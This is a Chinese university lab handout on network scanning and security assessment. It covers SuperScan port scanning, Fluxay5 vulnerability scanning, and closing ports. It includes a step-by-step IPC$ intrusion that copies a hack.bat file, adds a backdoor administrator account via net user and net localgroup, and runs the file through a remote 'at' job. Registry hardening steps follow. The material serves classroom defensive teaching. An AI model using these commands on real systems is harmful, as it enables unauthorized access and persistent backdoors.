实验2 网络扫描及安全评估实验

HUNAN UNIVERSITY《信息安全原理》实验报告实验二 网络扫描及安全评估实验一、实验目的掌握网络端口扫描器的使用方法,熟悉常见端口和其对应的服务程序,掌握发现系统漏洞的方法。

HUNAN UNIVERSITY

《信息安全原理》实验报告

实验二 网络扫描及安全评估实验

一、实验目的

掌握网络端口扫描器的使用方法,熟悉常见端口和其对应的服务程序,掌握发现系统漏洞的方法。

,

● 掌握综合扫描及安全评估工具的使用方法,了解进行简单系统漏洞入侵的方法,了解常

见的网络和系统漏洞以及其安全防护方法。

二、实验原理 ● 端口扫描原理

● 端口扫描向目标主机的TCP/IP服务端口发送探测数据包,并记录目标主机的响应。

通过分析响应来判断服务端口是打开还是关闭,就可以得知端口提供的服务或信息。

● 端口扫描主要有经典的扫描器(全连接)、SYN (半连接)扫描器、秘密扫描等。 ● 全连接扫描:扫描主机通过TCP/IP协议的三次握手与目标主机的指定端口建立一

次完整的连接。建立连接成功则响应扫描主机的SYN/ACK连接请求,这一响应表明目标端口处于监听(打开)的状态。如果目标端口处于关闭状态,则目标主机会向扫描主机发送RST 的响应。

● 半连接(SYN )扫描 :若端口扫描没有完成一个完整的TCP 连接,在扫描主机和目

标主机的一指定端口建立连接时候只完成了前两次握手,在第三步时,扫描主机中断了本次连接,使连接没有完全建立起来,这样的端口扫描称为半连接扫描,也称为间接扫描。

● TCP FIN(秘密)扫描:扫描方法的思想是关闭的端口会用适当的RST 来回复FIN

数据包。另一方面,打开的端口会忽略对FIN 数据包的回复。

● 综合扫描和安全评估技术工作原理

● 获得主机系统在网络服务、版本信息、Web 应用等相关信息,然后采用模拟攻击的

方法,对目标主机系统进行攻击性的安全漏洞扫描,如果模拟攻击成功,则视为漏洞存在。最后根据检测结果向系统管理员提供周密可靠的安全性分析报告。

三、实验环境

,

● 实验室所有机器安装了Windows 操作系统,并组成了一个局域网,并且都安装了

SuperScan 端口扫描工具和流光Fluxay5综合扫描工具。

● 每两个学生为一组:互相进行端口扫描和综合扫描实验。

四、实验内容和步骤

● 任务一:使用Superscan 端口扫描工具并分析结果

● 任务二:使用综合扫描工具Fluxay5并分析结果

● 撰写实验报告

任务一:使用Superscan 端口扫描工具并分析结果

Superscan使用简介:

任务一:使用Superscan 端口扫描工具并分析结果(续)

选择【Port list setup】,进行端口列表设置

,

扫描结果分析

任务一:使用Superscan 端口扫描工具并分析结果(续)

,

分组角色:学生A 、学生B 互相扫描对方主机。

实验步骤:

(1)在命令符提示下输入IPCONFIG 查询自己的IP 地址。

(2)在Superscan 中的Hostname Lookup 栏中,输入同组学生主机的IP 地址,可通过单击Lookup 按钮获得主机名。

(3)设置IP 栏、Scan type 栏、Scan 栏,使其对同组学生主机的所有端口以默认的时间参数进行扫描。

(4)根据扫描结果分析主机开放的端口类型和对应的服务程序。

(5)通过“控制面板”的“管理工具”中的“服务”配置 ,尝试关闭或开放目标主机上的部分服务,重新扫描,观察扫描结果的变化。

任务一:使用Superscan 端口扫描工具并分析结果(续)

● 常见端口的关闭方法:

● 1、关闭7.9等端口:关闭Simple TCP/IP Service, 支持以下 TCP/IP 服务:Character

Generator, Daytime, Discard, Echo, 以及 Quote of the Day。

2、关闭80端口:关掉WWW 服务。在“服务”中显示名称为“World Wide Web Publishing Service ”,通过 Internet 信息服务的管理单元提供 Web 连接和管理。

3、关掉25端口:关闭Simple Mail Transport Protocol (SMTP)服务,它提供的功能是跨网传送电子邮件。

4、关掉21端口:关闭FTP Publishing Service,它提供的服务是通过 Internet 信息服务的管理单元提供 FTP 连接和管理。

5、关掉23端口:关闭Telnet 服务,它允许远程用户登录到系统并且使用命令行运行控制台程序。

6、关掉139端口,139端口是NetBIOS Session 端口,用来文件和打印共享, 关闭139口听方法是在“网络和拨号连接”中“本地连接”中选取“Internet 协议(TCP/IP)”属性,进入“高级TCP/IP设置”“WINS 设置”里面有一项“禁用TCP/IP的NETBIOS ”,打勾就关闭了139端口。

● 利用TCP/IP筛选:网上邻居属性-本地连接属性-常规-internet 协议 (TCP/IP)属性-

高级-选项-TCP/IP筛选-属性-TCP 端口-只允许139,445,这样其他端口都被关闭了。

任务二:使用流光Fluxay5综合扫描工具并分析结果

,

各部份功能:

1: 暴力破解的设置区域

2:控制台输出

3:扫描出来的典型漏洞列表

4:扫描或者暴力破解成功的用户帐号

5:扫描和暴力破解的速度控制

6:扫描和暴力破解时的状态显示

7:中止按钮

8:探测记录查找

任务二:使用流光Fluxay5综合扫描工具并分析结果(续)

,

选择“文件(F )”→“高级扫描向导(W )”可打开高级扫描向导,设置扫描参数 。 扫描结束后,流光会自动打开HTML 格式的扫描报告,

而且还把可利用的主机列在流光界面的最下方,如图1所示。

图1

单击主机列表中的主机便可以直接对目标主机进行连接操作,如图2所示。

图2

,

除了使用“高级扫描向导”配置高级扫描外,还可以在探测菜单中直接选取高级扫描工具设置:

分组角色:学生A 、学生B 互相扫描对方主机。

实验步骤:

(1)开放FTP 服务,允许匿名连接。

(2)打开流光FLUXAY5工具,使用“高级扫描向导”进行设置,使其能对同组学生主机的全部端口、服务、漏洞、所有用户等进行全面的扫描。

(3)仔细观察扫描结果,分析同组学生主机上存在的各种漏洞。

(4)根据扫描结果分析FTP 漏洞:如结果显示有漏洞,则利用“流光”提供的入侵菜单进行FTP 连接,尝试上传或下载文件。

(5)根据扫描结果分析IPC$漏洞:

IPC 是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者可以与目标主机建立一个空连接而无需用户名和密码,从而可以得到目标主机上的用户列表,并可能破解用户密码。

IPC$相关命令:

● 建立和目标的ipc$连接命令:net use 目标IPipc$ “密码” /user:“ADMIN ”

(管理员账号),如:net use 2.168.27.128ipc$ “” /user:"administrator" ● 映射网络驱动器命令(将目标主机的盘映射到本地磁盘 ):net use 本地盘符

目标IP 盘符$,如:net use z: 2.168.27.128c$

● 和目标建立了ipc$后,则可直接用IP 加盘符加$访问。比如:copy 文件名 IP

盘符$路径文件名,如:copy hack.bat 2.168.27.128c$,也可直接对映射为本地磁盘的网络驱动器操作。

● 管理计算机上面的账号命令:net user

● 查看账号命令:net user

● 建立账号命令:net user name passwd /add(net user sysbak 123456 /add :

添加用户名为sysback ,密码为123456的账号 )

删除账号命令:net user name /delete

● 管理工作组命令:net localgroup 组名 用户名 /add[delete]

● 如:net localgroup administrators sysback /add。该命令表示把sysback

用户添加到管理员组(administrators )。

● 查看目标计算机的系统时间:net time ip

,

● 在远程主机上建立计划任务:at IP TIME COMMAND

● at 2.168.27.128 13:45 c:hack.bat (该命令表示在下午13点45分执

行目标主机C 盘中的hack.bat 文件, 时间一定要晚于当前远程主机系统时间) ● 删除和目标的ipc$连接命令: net use IPipc$ /del

● 断开所有IPC$连接: net use * /del

● 禁止建立空连接 :运行regedit ,找到主键[HKEY_LOCAL_MACHINE SYSTEM

CurrentControlSet Control LSA] ,把RestrictAnonymous (DWORD )的键值改为:00000001。

禁止自动打开默认共享 :找到主键

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters],把AutoShareServer (DWORD )的键值改为:00000000,

如果不存在,就新建一个再改键值。

● 利用破解的用户ADMINISTRATOR 对目标主机进行留后门入侵,步骤:

● 编写批处理文件hack.bat ,文件中包含两个命令:1)建立一个新账号,2)将新

账号加入administrators 组。

● 使用net 命令与目标主机建立连接

● 将批处理文件hack.back 拷贝至目标主机上。

● 通过计划任务使目标主机执行hack.bat 文件。

● 断开所有IPC$连接。

● 通过采用新账号与目标主机建立连接来验证账号是否成功建立。

● 删除和目标主机的连接。

● 执行安全防护措施:

● 目标主机对注册表进行修改:禁止建立空连接,禁止自动打开默认共享 ● 重新使用net 命令与目标主机建立连接,观察结果是否有变化。

实验报告要求

内容:

一、根据任务一的扫描结果,写出主机开放的端口类型和服务。同时写出尝试关闭或开放目标主机上的部分服务后重新扫描的新结果。

二、根据任务二的扫描结果,记录被扫描方的用户列表、提供的服务、共享的目录和已经存在的漏洞,分析这些漏洞,写出是系统哪方面设置防范不合理造成的,写出解决措施。

,

实验结果:

1. 使用Superscan 端口扫描工具

在使用软件之前,我们先来看看软件的全貌(图一)

图一

界面比较复杂,我们根据共享功能来介绍使用。

一)域名(主机名)和IP 相互转换

这个功能的作用就是取得域名比如:163.com 的IP ;或者根据IP :202.106.185.77取得域名。

在SuperScan 里面,有两种方法来实现此功能:

(1)通过Hostname Lookup来实现(如图二)

图二

标签: